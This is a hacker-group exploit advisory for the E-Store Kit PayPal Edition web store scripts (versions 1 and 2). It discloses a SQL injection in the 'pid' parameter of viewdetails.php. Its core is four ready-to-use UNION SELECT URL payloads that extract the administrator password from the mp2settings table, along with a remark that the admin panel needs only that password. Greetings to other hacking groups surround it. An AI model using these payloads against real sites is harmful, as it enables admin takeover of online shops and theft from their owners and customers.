E-Store Kit PayPal Edition versions 2 and below suffer from a SQL injection vulnerability.
fbe9ccbf8ef1a4f58a03ebc404c6e5ef3191a2cd8ac3008dbfedb9b0dcb39f17
###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability
##
## E-Store Kit-1 ( viewdetails.php pid )
## E-Store Kit-2 ( viewdetails.php pid )
## E-Store Kit-1 Pro PayPal Edition ( viewdetails.php pid )
## E-Store Kit-2 PayPal Edition ( viewdetails.php pid )
##
## www.magicscripts.com
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM & WwW.ReaL-HaCk.NeT
##
## Email : SQL@Hotmail.it
##
## SYRIAN Arab HACkErS
########################
########################
##
## -[[: Exploites :]]-
##
## E-Store Kit-1 www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--
## E-Store Kit-2 www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--
## E-Store Kit-1 Pro PayPal Edition www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,AdminPassword,0,0,0,0,0,0,0,0+FROM+mp2settings--
## E-Store Kit-2 PayPal Edition www.Target.com/viewdetails.php?pid=-1+UNION+SELECT+0,0,0,0,0,0,0,0,0,0,0,AdminPassword,0,0+FROM+mp2settings--
##
########################
########################
--[[ NOTE ]]--
In admin panel none username only admin password ;D
#########################################################################################################
#########################################################################################################
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD :: Ghost Hacker :: MuslimS HaCkErS ::
#########################################################################################################
#########################################################################################################